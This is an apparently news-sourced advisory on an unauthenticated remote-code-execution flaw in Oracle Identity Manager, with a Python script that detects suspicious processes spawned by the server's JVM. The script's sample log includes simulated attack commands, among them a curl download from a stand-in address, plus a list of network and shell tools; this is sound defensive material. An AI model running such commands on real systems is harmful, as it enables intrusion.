Critical Unauthenticated RCE in Oracle Identity Manager (CVE-2026-21992) Threatens Enterprise IAM
What It Is — Oracle Identity Manager (OIM) and Oracle Web Services Manager contain a critical remote-code-execution flaw (CVE-2026-21992) that can be triggered without any authentication. The vulnerability scores 9.8/10 on the CVSS v3.1 scale, the critical severity band: successful exploitation yields full compromise of the affected system.
Exploitability — The flaw is remotely exploitable and requires no credentials; proof‑of‑concept code has been publicly disclosed, and threat actors are actively scanning for vulnerable deployments.
Affected Products — Oracle Identity Manager (all supported versions) and Oracle Web Services Manager (bundled with OIM).
TPRM Impact — Because OIM is a core identity-and-access-management platform, a breach can cascade to downstream SaaS applications, on-premises systems, and partner ecosystems, creating a high-impact supply-chain risk.
Recommended Actions
- Deploy Oracle’s security patches for OIM and Web Services Manager immediately.
- Verify patch installation via Oracle’s advisory checklist and conduct post‑patch testing.
- Enforce network segmentation for IAM services and restrict inbound traffic to trusted sources.
- Enable comprehensive logging and real‑time monitoring for anomalous process execution.
- Review and rotate any privileged credentials that may have been stored in OIM.
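One concrete form of the "monitor for anomalous process execution" action above is to alert when the Java process hosting OIM spawns a shell, scripting interpreter, or download tool, since an unauthenticated RCE in a Java application server typically surfaces as exactly that kind of child process. The script below is an added example written for this summary; it is not code from the article or from Oracle. It assumes OIM runs inside a WebLogic managed server (so the hosting process is a `java` binary launched with the `weblogic.Server` main class), and the JSON-lines log format and the sample events are constructed for illustration; map the field names to whatever your EDR, auditd or Sysmon export produces.

```python
"""Flag suspicious descendants of the JVM that hosts Oracle Identity Manager.

Added example, not from the source article. The log format and the sample
events below are constructed; the WebLogic-based process shape is an
assumption about a typical OIM deployment.
"""
import json
import os

# Binaries an identity server's JVM has no business spawning in normal
# operation. Tune for your environment (e.g. legitimate scheduled jobs).
SUSPICIOUS_BINARIES = {
    "sh", "bash", "dash", "zsh", "ksh",
    "python", "python3", "perl", "ruby",
    "curl", "wget", "nc", "ncat", "socat",
}

# Constructed process-creation events, one JSON object per line.
# 203.0.113.5 is a documentation address, not a real indicator.
SAMPLE_EVENTS = """
{"ts":"2026-01-20T10:00:01Z","host":"oim-app01","pid":4120,"ppid":1,"user":"oracle","image":"/u01/jdk/bin/java","cmdline":"java -Dweblogic.Name=oim_server1 weblogic.Server"}
{"ts":"2026-01-20T10:05:12Z","host":"oim-app01","pid":4311,"ppid":4120,"user":"oracle","image":"/bin/sh","cmdline":"sh -c id"}
{"ts":"2026-01-20T10:05:13Z","host":"oim-app01","pid":4312,"ppid":4311,"user":"oracle","image":"/usr/bin/curl","cmdline":"curl -o /tmp/x http://203.0.113.5/x"}
{"ts":"2026-01-20T10:06:00Z","host":"oim-app01","pid":4400,"ppid":3990,"user":"oracle","image":"/bin/sh","cmdline":"sh /u01/scripts/backup.sh"}
{"ts":"2026-01-20T10:07:00Z","host":"oim-app01","pid":4500,"ppid":4120,"user":"oracle","image":"/u01/jdk/bin/java","cmdline":"java -version"}
"""


def parse_events(jsonl: str) -> list[dict]:
    """Parse one JSON object per non-blank line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def is_app_server_jvm(ev: dict) -> bool:
    """Assumption: OIM runs in a WebLogic managed server, so the hosting
    process is a java binary started with the weblogic.Server main class."""
    return (os.path.basename(ev["image"]) == "java"
            and "weblogic.Server" in ev["cmdline"])


def find_suspicious_children(events: list[dict], max_depth: int = 10) -> list[dict]:
    """Return one alert per suspicious binary whose ancestry (within
    max_depth hops) includes the OIM application-server JVM."""
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        if os.path.basename(ev["image"]) not in SUSPICIOUS_BINARIES:
            continue
        # Walk up the parent chain; stop at the first app-server JVM, at an
        # ancestor we have no record for, or at max_depth (guards against
        # pid reuse producing a cycle in the map).
        depth = 1
        parent = by_pid.get(ev["ppid"])
        while parent is not None and depth <= max_depth:
            if is_app_server_jvm(parent):
                alerts.append({
                    "ts": ev["ts"], "host": ev["host"], "pid": ev["pid"],
                    "image": ev["image"], "cmdline": ev["cmdline"],
                    "jvm_pid": parent["pid"], "depth": depth,
                })
                break
            parent = by_pid.get(parent["ppid"])
            depth += 1
    return alerts


def detect(jsonl: str) -> list[dict]:
    """Convenience wrapper: parse a JSON-lines export and return alerts."""
    return find_suspicious_children(parse_events(jsonl))


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']} pid={alert['pid']} "
              f"depth={alert['depth']} under JVM {alert['jvm_pid']}: "
              f"{alert['cmdline']}")
```

Run against the constructed sample, the script flags the shell spawned directly by the OIM JVM and the download tool two hops below it, while ignoring the backup shell whose parent is an unrelated process and the harmless `java -version` child. Walking the full ancestry rather than checking only the immediate parent is what catches the second-stage process; the depth cap keeps the walk bounded if pid reuse ever makes the parent map loop.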
Source: The Hacker News